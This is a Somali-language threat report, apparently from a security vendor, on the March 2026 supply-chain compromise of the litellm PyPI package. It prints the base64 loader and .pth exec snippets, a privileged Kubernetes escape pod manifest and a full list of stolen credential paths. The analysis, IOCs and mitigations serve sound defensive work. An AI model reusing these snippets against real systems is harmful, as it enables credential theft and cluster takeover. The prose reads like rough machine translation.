Weerarka Silsiladda Sahayda ee LiteLLM

Weerarka Silsiladda Sahayda ee LiteLLM: Sida TeamPCP u qaabayso Kaabayaasha AI ee Backdoor

Waa maxay Sababta Tani?

Maarso 24, 2026, xirmada caanka ah ee Python litelm, albaab wakiil oo caalami ah oo LLM ah oo ay isticmaalaan kumanaan qof enterprises si loogu wareejiyo taraafikada u dhaxaysa codsiyada iyo bixiyeyaasha AI sida OpenAI, Anthropic, Google, iyo AWS Bedrock, si aamusnaan ah ayaa loogu xadgudbay PyPI. Laba nooc oo sun ah (1.82.7 iyo 1.82.8) ayaa la daabacay 13 daqiiqo gudahood, iyagoo wata culays marxalado badan leh oo xaday aqoonsiyada, soo saaray sirta daruuraha, si dhinac ah ugu faafay kooxaha Kubernetes, oo rakibay albaab dambe oo joogto ah oo leh awoodo fulin kood fog.

Iyadoo ku dhow 3.6 milyan oo soo dejin ah maalintii iyo fidinta qoto dheer ee kaabayaasha AI ee daruuriga ah, litelm waxay ku taal isgoysyada wax kasta oo weeraryahannada casriga ahi ay rabaan: furayaasha API ee bixiye kasta oo weyn oo AI ah, aqoonsiga daruuraha IAM, sirta Kubernetes, iyo furayaasha SSH.

Laakiin tanaasulka litelm ma ahayn dhacdo gooni ah. Waxay ahayd natiijada Olole shan maalmood ah, oo shan-deegaan ah jilaa khatar ah oo loo yaqaan TeamPCP, olole markii ugu horreysay sumeeyay iskaan-qaadayaasha amniga (Aqua Trivy, Checkmarx KICS), ka dibna adeegsaday xatooyada CI/CD Aqoonsiyada si loogu shubo npm, OpenVSX, iyo ugu dambeyntii PyPI. Weeraryahannadu waxay hubeeyeen qalabka ay ururadu ku tiirsan yihiin si ay u ilaaliyaan silsiladahooda sahayda.

Weerarkani wuxuu matalayaa isbeddel tallaabo ah oo ku yimid qaabka khatarta silsiladda sahayda. Naqshadaynta nidaamyada deegaanka ee badan, oo wax u dhimaysa qalabka amniga si loo gaaro qiimo sare Kaabayaasha AI, waxay muujinaysaa heer qorsheyn iyo bisayl hawlgal oo la jaan qaadaya qalabka weerarka ee sii kordhaya. Culaysyada la bixiyay waxaa lagu celceliyay waqtiga dhabta ah (saddex nooc oo kala duwan oo culays ah ayaa ka muuqda koodhka isha, oo ay ku jiraan noocyo hore oo faallo laga bixiyay), kaabayaasha C2 ayaa la diiwaan geliyay maalin ka hor weerarka, qaybaha nadiifintana si taxaddar leh ayaa loo doortay si ay ugu ekaadaan kaabayaasha iibiyaha ee sharciga ah. Qalabka ururinta aqoonsiga ee nidaamsan oo dhammaystiran, oo daboolaya 15+ qaybood oo ay ku jiraan bartilmaameedyo gaar ah sida furayaasha saxiixa Cardano iyo habaynta WireGuard, waxay soo jeedinaysaa heer dhammaystiran oo tilmaamaya horumarinta malware-ka ee AI-ka caawiya sida isku-dhufashada xoogga.

Jadwalka

Taariikh (UTC) Event
March 19 TeamPCP waxay ku xadgudubtay calaamadaha Aqua Trivy GitHub Action, iyagoo ku beddelaya kood xaasidnimo ah oo sifeeya CI/CD sir ka timid kaydka hoose
March 21 Heshiisku wuxuu ku fidsan yahay Checkmarx KICS iyo AST GitHub Actions iyadoo la adeegsanayo farsamooyin la mid ah
Maarso 22, 06:35 BerriAI waxay daabacdaa litellm 1.82.6 (nooca ugu dambeeya ee nadiifka ah) iyada oo loo marayo caadi CI/CD pipeline kaas oo u adeegsada Trivy iskaanka amniga
March 23 TeamPCP waxay diiwaangelisaa models.litellm.cloud (domain-ka saarista). Waxay ka hortagtaa xirmooyinka npm 66+ iyo kordhinta OpenVSX.
Maarso 24, 10:39 litelm 1.82.7 ayaa lagu daabacay PyPI -- culayska la saaray proxy_server.py marka la eego baaxadda module-ka. Waxay ku shaqeysaa soo dejinta
Maarso 24, 10:52 litelm 1.82.8 la daabacay 13 daqiiqo ka dib -- ayaa ku daray litellm_init.pth, habayn waddo Python ah oo ka shaqeysa shirkad kasta oo turjumaan Python ah, oo aan ahayn kaliya soo dejinta litelm. Waxay muujinaysaa soo noqnoqoshada degdegga ah ee culayska
Maarso 24, ~16:00 PyPI waxay ka saartaa labada noocba ka dib marka la soo sheego warbixinnada bulshada. Noocyada si buuxda ayaa looga tirtiraa tusmada (lama jaro) index-ka, inkastoo kubbadaha CDN-ka ay weli diyaar yihiin.

Daaqadda soo-gaadhista: qiyaastii 5.5 saacadood. Inta lagu jiro waqtigan, wax kasta oo pip install litellm, pip install --upgrade litellm, ama CI/CD pipeline Soo jiidashada nooca ugu dambeeyay waxay fulin lahayd culayska mushaharka.

Sidee Malware-ku ku soo galay: Heshiiskii Cascading-ka ahaa

Xirmada litelm si toos ah looma jebin. Weeraryahanku wuxuu ku gaaray Weerar silsilad sahay laba-bood ah:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

LiteLLM's CI/CD pipeline Trivy wuxuu u adeegsaday iskaanka amniga - qalabka loogu talagalay in lagu qabto nuglaanta ayaa ahaa laftiisu habka weerarka. Sababtoo ah pipeline Trivy oo lagu tixraacay calaamadda la beddeli karo halkii laga dhejin lahaa commit SHA, ficilka la jabsaday si toos ah ayuu u socday. Ficilka Trivy ee xaasidnimada leh wuxuu soo saaray sirta deegaanka, oo ay ku jiraan PYPI_PUBLISH calaamad, taasoo siinaysa TeamPCP marin toos ah oo daabacaadda loogu talagalay mashruuca litelm PyPI.

Istaraatiijiyadan "ka-tanaasulka ilaalada" waa astaan ​​​​u ah ololaha TeamPCP. Iyagoo marka hore bartilmaameedsanaya qalabka amniga (Trivy, Checkmarx KICS), weeraryahannadu waxay isla mar ahaantaas curyaaminayaan ogaanshaha waxayna heleen marin u helid mudnaan leh oo ku saabsan silsiladaha sahayda ee hoose.

Falanqaynta Farsamada: Culayska Mushaharka

Dhibcaha Cirbadda

Version 1.82.7 - Fulinta heerka module-ka ee litellm/proxy/proxy_server.py (sadar 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

Koodhkani wuxuu ku fadhiyaa baaxadda module-ka ee u dhaxaysa qaamuuska qoraalka ah iyo kan asalka ah showwarning() Shaqada. Waxay isla markiiba fulisaa marka litellm.proxy.proxy_server waa la soo dejiyaa - taas oo dhacda marka la isticmaalo shaqada wakiillada litelm.

Version 1.82.8 — Lagu daray litellm_init.pth (Faylka habaynta wadada Python):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python .pth faylasha gudaha site-packages/ waxaa lagu farsameeyaa shirkad kasta oo turjubaan ah, laakiin khadadka oo keliya ayaa ka bilaabma import waxaa loo fuliyaa sida koodhka. Weeraryahanku wuxuu ka faa'iidaystaa tan isagoo ku xidhxidhaya culayska oo dhan hal mid import bayaanka: import os, subprocess, sys; subprocess.Popen(...)Tani aad bay uga gardarro badan tahay duritaanka proxy_server.py — way shiddaa xitaa haddii litelm aan waligiis la soo gelin, marka la bilaabayo geeddi-socod kasta oo Python ah. pyproject.toml wax laga beddelay si loogu daro faylkan qaybinta:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

Nooca 1.82.8 sidaas darteed wuxuu leeyahay laba waddo oo fulin madax-bannaan: duritaanka proxy_server.py (wuxuu dab ku shidaa soo dejinta wakiilka litelm) iyo faylka .pth (wuxuu dab ku shidaa bilow kasta oo Python ah). Dib-u-dhaca laftiisu waa mid la dareemi karo - wuxuu ka hortagaa ogaanshaha ama ka saarista labada waddo oo keliya. Kordhinta waqtiga soo dejinta ilaa fulinta waqtiga bilowga 13 daqiiqo ka dib 1.82.7 waxay soo jeedinaysaa in weeraryahanku uu la socday guusha hawlgalinta oo uu si degdeg ah u soo noqnoqonayo.

Marxaladda 1aad: Goosashada Shahaadooyinka oo Dhamaystiran

Qoraalka gudaha ee la furfuray waa mid aan lahayn aqoonsi sax ah. Waxay isticmaashaa os.walk()glob.glob()subprocess.check_output(), iyo faylka tooska ah ayaa akhrinaya si uu u nadiifiyo nidaamka oo dhan:

Noocyada bartilmaameedyada
Dib u eegista nidaamka hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; furayaasha martida laga bilaabo /etc/ssh/
Daruur (AWS) ~/.aws/credentials, ~/.aws/config; Aqoonsiga doorka IMDS iyada oo loo marayo 169.254.169.254Maareeyaha Sirta ListSecrets; SSM DescribeParameters
Daruur (GCP) ~/.config/gcloud/ (ku celcelin); $GOOGLE_APPLICATION_CREDENTIALS
Daruur (Azure) ~/.azure/ (dib-u-celin); doorsoomayaasha deegaanka
Kubureteska Calaamadaha akoonka adeegga; ca.crt; magac-boos; kubectl get secrets --all-namespaces; dhammaan sirta iyada oo loo marayo K8s API
Faylasha deegaanka .env, .env.local, .env.production, .env.development, .env.staging — si isdaba joog ah ayaa loo raadiyay (qoto dheer 6) oo dhan /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
Calaamadaha baakadaha ~/.npmrc, ~/.vault-token, ~/.netrc
Macluumaadka ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Qaabeynta MongoDB
TLS / SSL Furaha gaarka ah ee ka imanaya /etc/ssl/private/, Aan Qarinno Shahaadooyinka, dhammaan .pem/.key/.p12/.pfx files
tag ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Boorsooyinka Crypto Bitcoin, keydka furaha Ethereum, xirmooyinka furaha Solana (ansixiye, cod, saami, qasabad), furayaasha saxiixa Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero
Taariikhda Shell .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
Oggolaanshaha nidaamka /etc/passwd, /etc/shadow, diiwaannada oggolaanshaha (kalfadhiyada SSH ee la aqbalay)
Furaha Webhook/API Grep for Slack webhooks, Shabakadda Discordhooks, Furaha/siraha API ee faylasha habaynta
VPN Qaabeynta WireGuard laga bilaabo /etc/wireguard/

Baaxadda qalabkan goosashada waa mid encyclopedic ah. Ma aha oo kaliya aqoonsiga daruuraha laakiin sidoo kale wuxuu bartilmaameedsadaa boorsooyinka cryptocurrency-ka, furaha sirta ah ee xogta, habaynta VPN, iyo CI/CD sir — taasoo soo jeedinaysa in weeraryahanku uu damacsan yahay inuu lacag ka sameeyo nidaamyada la jabsaday ee ku baahsan qaybo badan.

Marxaladda 2: Faafinta Qarsoon

Xogta la xaday waa la sireeyaa oo la sifeeyaa iyadoo la adeegsanayo nidaam sir ah oo isku-dhafan:

  • AES-256-CBC Ku qarinta dhammaan xogta la ururiyey iyadoo la adeegsanayo furaha kalfadhiga 32-byte ee aan kala sooca lahayn (iyada oo loo marayo openssl enc)
  • RSA-4096 sir ahaanshaha furaha kalfadhiga iyadoo la adeegsanayo furaha dadweynaha ee ku dhex jira weeraryahanku (oo loo yaqaan OAEP suufka, iyada oo loo marayo openssl pkeyutl)
  • Labada fayl ee ciphertext-ka ah ayaa loo qaybiyay sida tpcp.tar.gz (ka tpcp horgalaha — “TeamPCP” — wuxuu si joogto ah uga muuqdaa ololaha oo dhan)
  • POST-ka HTTPS-ka https://models.litellm.cloud/ la Content-Type: application/octet-stream

Domain-ka models.litellm.cloud waxaa la diiwaan geliyay Maarso 23 — maalin ka hor weerarka — waxaana loogu talagalay inuu la midoobo kaabayaasha sharciga ah ee litelm (mashruuca dhabta ah wuxuu adeegsadaa litellm.aiXitaa difaac shabakadeed oo ka warqaba taraafikada ka baxda waxaa laga yaabaa inaysan taraafikada u calaamadin waxa u muuqda inay tahay natiijada moodeelka litellm.

Marxaladda 3: Albaabka Dambe ee Joogtada ah (sysmon.py)

Culaysku wuxuu ku rakibayaa albaab dambe oo codbixinta ah oo loo ekeysiiyay nidaamka telemetry:

  • Jidka~/.config/sysmon/sysmon.py
  • Servicesysmon.service (cutubka isticmaalaha nidaamka, oo lagu tilmaamay "Adeegga Telemetry-ka Nidaamka")
  • DabeecaddaKa dib markii uu seexday 300 ilbiriqsi, codkiisa ayuu dhiibtay https://checkmarx.zone/raw ~50 daqiiqo kasta
  • fulinta: Soo deji URL-ka uu soo celiyay C2 si /tmp/pglog, wuxuu dejiyaa mid la fulin karo (chmod 755), wuxuu ku shaqeeyaa kalfadhi gooni ah
  • Dabagalka Gobolka/tmp/.pg_state waxay ka hortagtaa dib u soo dejinta isla culayska mushaharka
  • adkaysigaRestart=alwaysRestartSec=10 - waxay ka badbaaddaa shilalka iyo dib u bilaabashada

Domain-ka checkmarx.zone waa qalad qoraal ah oo Checkmarx ah (shirkadda amniga ee ku taal checkmarx.com), loogu talagalay in falanqeeyayaasha SOC ee dib u eegaya diiwaannada shabakadda ay arkaan taraafikada u socota wax u muuqda inay yihiin iibiyaha amniga ee sharciga ah. Tani waa farsamo si ula kac ah looga baxsado oo la jaanqaadaysa istaraatiijiyadda ballaaran ee TeamPCP ee ku dhuumanaysa sumcadda iibiyaha amniga.

Marxaladda 3b: Dhaqdhaqaaqa Dhinaca Kubernetes

Haddii nidaamka la jabsaday uu leeyahay aqoonsiyada akoonka adeegga Kubernetes, malware-ku wuxuu tiriyaa dhammaan qanjidhada kooxeed wuxuuna geeyaa sanduuqyada mudnaanta leh mid kasta:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

Qalab kasta:

  • U shaqeeya sidii mudnaan mudan la hostPIDhostNetwork, iyo marin u helidda nidaamka faylka martida loo yahay oo dhammaystiran
  • Isticmaalida chroot /host si loo rakibo isla sidaas sysmon.py albaabka dambe ee nidaamka faylka xididka ee martida loo yahay
  • Waxay u diiwaangelisaa sidii adeeg systemd ah, iyadoo hubinaysa in si joogto ah looga badbaado tirtirka pod-ka
  • magacaabay node-setup-* ee kube-system namespace si ay u muuqato kaabayaal kooxeed oo sharci ah

Tani macnaheedu waa a hal tanaasul ah CI/CD orodyahan leh marin u helidda K8s waxay keeni kartaa in qayb kasta oo ka mid ah kooxda ay noqoto albaab dambe - xaalad dhaqdhaqaaq dhinac ah oo masiibo ah oo loogu talagalay ururada u maamula litelm wakiil ahaan Kubernetes.

Horumarka Lacag-bixinta (Noocyada Faallooyinka laga bixiyay)

Koodhka isha ee khadadka 131-132 wuxuu ka kooban yahay laba nooc oo hore oo faa'iido ah, taasoo muujinaysa habka horumarinta ee weeraryahanku:

  • Saddex nooc oo kala duwan wadaagaan isla kaabayaasha qodista biyaha (models.litellm.cloud), furaha dadweynaha ee RSA-4096, duubista sirta isku-dhafan ee AES-256-CBC + RSA, iyo tpcp.tar.gz Magacaabista xidhmada
  • Noocyo hore ku daray Lakabka sirta ah ee RC4 gudaha qoraalka ururinta xogta, iyadoo la qarinayo xogta la soo ururiyay ka hor duubka dibadda ee AES+RSA. Culayska firfircoon (khadka 130) ayaa la fududeeyay iyadoo laga saarayo lakabkan gudaha ee RC4
  • Noocyada hore ayaa loo isticmaalaa exec() la StringIO qabashada si loo socodsiiyo ururiyaha oo hawsha ku jira, halka culayska firfircoon uu isticmaalo subprocess.run() oo leh dib-u-hagaajin stdout — kala-soocid nadiif ah oo ka fogaatay wasakhaynta habka martida loo yahay
  • Saddexda noocba waxay bartilmaameedsanayaan qaybaha aqoonsiga iyo waddooyinka ururinta isku mid ah
  • Furaha RC4 ee noocyadii hore wuxuu ahaa aflagaado kicin ah, oo la jaan qaadaya dhaqanka dareenka ee jilaaga ee Telegram.

Tani waxay muujinaysaa horumar firfircoon inta lagu jiro hawlgalka. Weeraryahanku wuxuu fududeeyay xidhmada sirta wuxuuna hagaajiyay go'doominta fulinta isagoo ilaalinaya bartilmaameedyada ururinta iyo kaabayaasha nadiifinta.

Tilmaamayaasha Tanaasulka (IOCs)

Network

Tusiyaha nooca Ujeeddo
models.litellm.cloud Domain Meesha ugu dambaysa ee soo saarista (HTTPS POST)
checkmarx.zone Domain Dhammaadka codbixinta C2 (HTTPS GET) /raw)

Fiiro gaar ah: Xiriiriyeyaasha warbixinta dibadda checkmarx.zone/static/checkmarx-util-1.0.4.tgz ilaa marxaladdii hore ee KICS ee ololaha TeamPCP. URL-kan laguma helin culaysyada litelm ee halkan lagu falanqeeyay.

Xadhkaha Xirmooyinka

file SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

Nidaamka Faylka

Tusiyaha nooca Ujeeddo
~/.config/sysmon/sysmon.py file Qoraal joogto ah oo albaabka dambe ah
~/.config/systemd/user/sysmon.service file Cutubka joogtaynta nidaamka
/tmp/pglog file La soo dejiyay marxaladda labaad ee binary-ka
/tmp/.pg_state file Dabagalka xaaladda C2
litellm_init.pth in site-packages/ file Jiid bilowga Python (v1.82.8 oo keliya)
tpcp.tar.gz file Xirmo sifeyn ah oo sir ah

Kubureteska

Tusiyaha nooca Ujeeddo
node-setup-* sanduuqyada ku jira kube-system xilkii guddoomiyenimo Dhaqdhaqaaq dhinac ah oo mudnaan leh
sysmon.service qanjidhada kooxda Service Adkeysiga heerka martida iyada oo loo marayo baxsashada pod

Sir ah

Tusiyaha Details
Furaha dadweynaha ee weerarka RSA-4096 Sawirka faraha ee SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8Ku dhex jira dhammaan saddexda nooc ee culayska; isla furaha ayaa laga soo sheegay hawlgallada kale ee TeamPCP
tpcp horgale ku jira farshaxanka Heshiiska magaca xidhmada (tpcp.tar.gz) si joogto ah ololaha oo dhan

Tilmaamaha: TeamPCP

Jilaaga khatarta ah ee ka dambeeya ololahan ayaa la raadraacayaa sida TeamPCP, oo sidoo kale loo yaqaan PCPcat, Persy_PCP, ShellForce, iyo DeadCatx3.

Sifooyin la yaqaan:

  • Waxay maamushaa kanaalada Telegram-ka ee ku yaal @Persy_PCP iyo @teampcp halkaas oo ay ku jeesjeeseen shirkadaha amniga
  • Waxay ka shaqeysaa nidaamyada deegaanka ee kala duwan (GitHub Actions, PyPI, npm, OpenVSX)
  • Wuxuu adeegsadaa domain-yada nooca typosquat-ka ee gaarka u ah iibiyaha marxalad kasta oo ololaha ah (tusaale ahaan, checkmarx.zone ee Checkmark, models.litellm.cloud loogu talagalay litelm)
  • Calaamadaha kaabayaasha joogtada ah: isku xidhka furaha RSA, tpcp.tar.gz heshiiska magac bixinta, tpcp-docs-* Kaydka GitHub waxaa loo isticmaalay sidii meel lagu kaydiyo xogta
  • Qalabka amniga wuxuu bartilmaameedsadaa meelaha laga soo galo silsiladaha sahayda ee hoose

Kalsoonida lahaanshaha: Sare. Furaha dadweynaha ee RSA ee la wadaago, tpcp Magacaabista farshaxan, isku-darka kaabayaasha C2, iyo xawaaraha hawlgalka ee ololaha shanta maalmood ah ayaa si xooggan isugu xira heshiisyada Trivy, KICS, npm, OpenVSX, iyo litelm isla jilaaga.

Rabitaan: Dhaqaale ahaan (xatooyada jeebka sirta ah, lacag-bixinta aqoonsiga daruuraha) oo ay weheliso caannimo (jees jeesjees Telegram ah). Ballaca ururinta aqoonsiga - laga bilaabo AWS IAM ilaa furaha furaha ee ansaxinta Solana ilaa habaynta WireGuard - waxay soo jeedinaysaa jilaa dhaqaale ahaan ku dhiiran oo doonaya inuu kordhiyo ROI-ga heshiis kasta.

Caawinta suurtagalka ah ee AI: Qalabka soo ururiya aqoonsiga si nidaamsan ayuu u dhammaystiran yahay — 15+ qaybood oo ay ku jiraan bartilmaameedyo gaar ah sida furayaasha saxiixa Cardano, habaynta WireGuard, iyo aqoonsiga Kaniko Docker — si waafaqsan tirinta caawinta AI. Xawaaraha ku celcelinta culayska mushaharka (saddex nooc oo leh qorshayaal sir ah oo kala duwan), isku-dubaridka nidaamka deegaanka (5 nidaam oo deegaan ah 5 maalmood gudahood), iyo OPSEC oo shaqeynaya (domains-ka iibiyaha, sir ahaanshaha isku-dhafka ah, joogtaynta nidaamsan oo loo qariyay telemetry) waxay soo jeedinayaan heer wax-soo-saar oo laga yaabo inuu ka tarjumayo horumarka caawinta AI oo ah isku-dhufashada xoogga. Qiimayntani waa mid male-awaal ah; hawl-wadeennada xirfadda leh waxay gaari karaan baaxad la mid ah iyada oo aan la isticmaalin qalabka AI.

TTP-yada iyo Farsamooyinka Cusub

1. Sumowga Silsiladda Qalabka Amniga (nooca T1195.002)

Isbarbardhigga iskaan-gareeyayaasha amniga (Trivy, KICS) oo ah tallaabada ugu horreysa ee lagu gaarayo bartilmaameedyada hoose waa kor u kac cusub. Weeraryahanku ma uusan kaliya wax u dhimin maktabad - wuxuu wax u dhimay qalabka ay ururadu u isticmaalaan si ay u ogaadaan Maktabado la jabsaday. Tani waxay abuurtaa meel aan la arki karin: iskaanka qaban kara koodhka xaasidnimada leh ayaa ah habka gaarsiinta.

2. Python .pth Faylka Joogteynta (T1546)

The litellm_init.pth farsamada ku jirta v1.82.8 waa mid si gaar ah u qarsoon. .pth faylasha gudaha site-packages/ waxaa lagu farsameeyaa shirkad kasta oo turjubaan ah; sadar kasta oo ka bilaabma import waxaa loo fuliyaa sida koodhka. Iyadoo culayska mushaharka lagu xidho hal keliya. import Bayaanka, weeraryahanku wuxuu ku guuleystaa fulinta geeddi-socod kasta oo Python ah - ma aha oo kaliya marka litelm la soo dejiyo. Tani waxay ka dhigan tahay in culayska la saaro uu shido xitaa haddii litelm la rakibo laakiin aan waligiis la isticmaalin, wuxuuna ka badbaaday hagaajinta beddeleysa kuwa la jabsaday. .py faylasha iyada oo aan la hubin .pth files.

3. Dhaqdhaqaaqa Dhinacyada Kubernetes iyada oo loo marayo Hawlgalka Dhinacyada Mudnaanta leh (T1610, T1611)

Abuuritaanka otomaatiga ah ee qaybaha mudnaanta leh ee ku yaal qayb kasta oo kooxeed - oo leh hostPIDhostNetwork, nidaamka faylka martida loo yahay, iyo chroot si loo rakibo adkeysi — dejinta weelasha silsiladaha (T1610) oo leh baxsasho loo tago martigeliyaha (T1611) si loo beddelo hal shaqo oo la wiiqay oo isu beddela tanaasul kooxeed oo dhammaystiran.

4. Iibiyaha-Isku-dayga Kaabayaasha C2

Isticmaalka models.litellm.cloud (waxay ku dayanaysaa litelm) iyo checkmarx.zone (waxay ku dayanaysaa Checkmarx) maadaama C2/exfil endpoints loogu talagalay in laga fogaado la socodka shabakadda. Falanqeeyayaasha SOC ee dib u eegaya taraafikada ka baxda waxay arki doonaan isku xirka HTTPS ee waxa u muuqda inay yihiin domains-ka iibiyaha ee sharciga ah.

5. Soo noqnoqoshada culayska degdegga ah ee duulimaadka gudahiisa

Daabacaadda v1.82.7 oo leh fulinta waqtiga soo dejinta, ka dibna v1.82.8 oo leh fulinta waqtiga bilowga 13 daqiiqo ka dib, waxay muujinaysaa la socodka iyo la qabsiga weerarka waqtiga dhabta ah. Kala duwanaanshaha culayska lacagta ee faallooyinka laga bixiyay (oo leh qorshayaal sir ah oo kala duwan) oo lagu keydiyay koodhka isha ayaa xaqiijinaya horumar firfircoon inta lagu jiro hawlgalka.

Maxaa la samayn karaa

Weerarkan wuxuu ka faa'iidaystaa kalsoonida lakab kasta: kalsoonida qalabka amniga, kalsoonida diiwaannada xirmooyinka, kalsoonida goobaha la yaqaan, ku kalsoonow CI/CD otomaatig. Ka difaaciddeeda waxay u baahan tahay adkaynta mid kasta oo ka mid ah xuduudahan kalsoonida:

Macaamiisha Xirmooyinka

  • Ku tiirsanaanta pin-ka hash ahaan, ma aha oo kaliya nooca. pip install litellm==1.82.6 --hash=sha256:... waxay ka hortagi lahayd in noocyada la jabsaday la rakibo xitaa haddii ay si kooban u muuqdaan noocii ugu dambeeyay.
  • Isticmaal faylasha qufulka. pip-compilepoetry.lock, Iyo uv.lock Qabso noocyada saxda ah iyo hashyada. CI/CD waa in laga soo dejiyaa faylasha qufulka, ee aan laga soo dejin noocyada sabbaynaya.
  • La soco .pth files. In si joogto ah loo baaro site-packages/ lama filaan ah .pth faylasha - waxay ku shaqeeyaan bil kasta oo Python ah waana farsamo joogtayn aan la qiimayn.
  • Hirgeli xakamaynta shabakadaha bixista. Sifeynta loo sameeyo models.litellm.cloud iyo C2 codbixin loo qaadayo checkmarx.zone waxaa lagu qaban karay shaandhaynta bixitaanka ee ku salaysan liiska ogolaanshaha ee deegaannada wax soo saarka.

Loogu talagalay Dadka Dayactira Xirmooyinka

  • Pin CI/CD ficillada ay sameeyeen commit SHA, ee maaha tag. LiteLLM's pipeline waxay isticmaashay Trivy iyada oo aan lahayn nooc la dhejiyay. Haddii ay tixraaci lahayd aquasecurity/trivy-action@<commit-sha> halkii @latest, ficilka la isku halleyn waayay ma fulin lahayn.
  • Isticmaal calaamadaha daabacaadda ee cimriga gaaban, oo la cabbiray. PyPI waxay taageertaa Daabacayaasha la aamini karo (ku salaysan OIDC) iyo calaamadaha API ee la cabbiray. PYPI_PUBLISH calaamaddu ma ahayn inay lahaato marin daabacaad oo waara oo aan xadidnayn.
  • Awood u yeelo xaqiijinta laba-qodob ee PyPI. U baahan 2FA dhammaan ilaaliyayaasha oo isticmaal furaha amniga qalabka haddii ay suurtagal tahay.
  • Xirmooyinka saxiixa. Shahaadooyinka Sigstore/PEP 740 waxay u oggolaanayaan macaamiisha inay xaqiijiyaan in baakad ay dhistay iyadoo la filayo. CI/CD pipeline, ma aha weerare wata calaamad la xaday.

Hawl wadeennada Madal (PyPI, npm, GitHub)

  • Soo ogow qaababka daabacaadda ee aan caadiga ahayn. Laba nooc oo cusub oo la daabacay 13 daqiiqo u dhexeeya, oo ka duwan IP ama calaamad ka duwan sidii caadiga ahayd, waa inay kiciyaan dib-u-eegis ama iskaanka otomaatiga ah ka hor inta aan xirmada la rakibin.
  • Dardargelinta qaadashada Daabacayaasha la aamini karo. Daabacaadda ku salaysan OIDC waxay xirmooyinka ku xidhaa kaydadka gaarka ah iyo socodka shaqada, taasoo ka dhigaysa calaamadaha la xaday kuwo aan waxtar lahayn marka laga reebo asalka asalka ah CI/CD macnaha guud.
  • Hirgeli iskaanka malware-ka ee waqtiga daabacaadda. Culeyska lacagta ee saldhiga64-decoded ee ku jira proxy_server.py waxaa lagu ogaan karaa falanqaynta joogtada ah wakhtiga daabacaadda.

Nidaamka Deegaanka

  • Qalabka amniga ula dhaqan sidii kaabayaal muhiim ah. Trivy iyo Checkmarx KICS waxaa isticmaala malaayiin pipelines. Ficilladooda GitHub waa in la saxiixo, la dhejiyaa, oo lala socdaa si la mid ah sida baakadaha ay sawiraan.
  • Maalgeli ogaanshaha waqtiga socodsiinta. Falanqaynta taagan oo keliya ma qaban karto farsamo kasta oo qarsoon. La socodka waqtiga socodsiinta ee rakibidda baakadaha hooks, isku xirnaanta shabakadaha aan la filayn, iyo qaababka marin u helidda faylasha ee shakiga leh waxay si qoto dheer u bixiyaan difaac.
  • Si dhakhso leh ula wadaag sirdoonka khatarta. Daaqadda soo-bandhigidda 5.5-saacadood ee litelm waxay noqon kartay mid gaaban iyadoo isku-dubbarid degdeg ah oo iibiyeyaasha isdhaafsiga ah. Adeegyada iskaanka otomaatiga ah sida Xygeni MEW, Socket, iyo Snyk waxay ogaadeen cilladda - caqabadda ayaa ah waqtiga xaqiijinta aadanaha iyo jawaabta diiwaangelinta.

Ugu Dambeyn

Ololaha TeamPCP waa waqti muhiim ah software supply chain securityMarkii ay marka hore wax ka beddeleen iskaan-gareeyayaasha amniga oo ay u adeegsadeen sidii tallaabooyin lagu gaarayo kaabayaasha AI ee qiimaha sare leh, weeraryahannadu waxay muujiyeen in silsiladda sahaydu ay la mid tahay ku-tiirsanaanteeda ku-meel-gaarka ah ee ugu liidata, iyo ku-tiirsanaantu ay noqon karto qalabka amniga ee aad ku kalsoon tahay si uu kuu ilaaliyo amniga.

Heshiiska litelm wuxuu si gaar ah u muujinayaa khatarta sii kordheysa ee kaabayaasha AI. Maadaama albaabada wakiillada LLM ay noqdaan standard qaab loogu talagalay enterprise Hawlgalinta AI, waxay diiradda saaraan helitaanka furayaasha API, aqoonsiga daruuraha, iyo xogta xasaasiga ah hal qayb. Is-waafajinta qaybtaas waa furaha qalfoofka ee dhammaan kaydka AI.

Ururadii rakibay litelm 1.82.7 ama 1.82.8 inta lagu jiro daaqadda 5.5-saacadood waa inay tan ula dhaqmaan sidii tanaasul aqoonsi oo buuxa: wareeji dhammaan sirta ku saabsan nidaamyada ay saameysay, hubi kooxaha Kubernetes si aad u hubiso node-setup-* sanduuqyada ku jira kube-system, ka saar wax kasta sysmon.service cutubyada nidaamka, iyo hubi litellm_init.pth Python site-packages/ Tilmaamaha. Isticmaalayaasha sawirka rasmiga ah ee Docker (ghcr.io/berriai/litellm) saameyn kuma yeelan, maadaama sawirku uu ku dhegay ku-tiirsanaantiisa oo aan dib loo dhisin inta lagu jiro daaqadda soo-gaadhista.

About the Author

La-aasaasaha & CTO

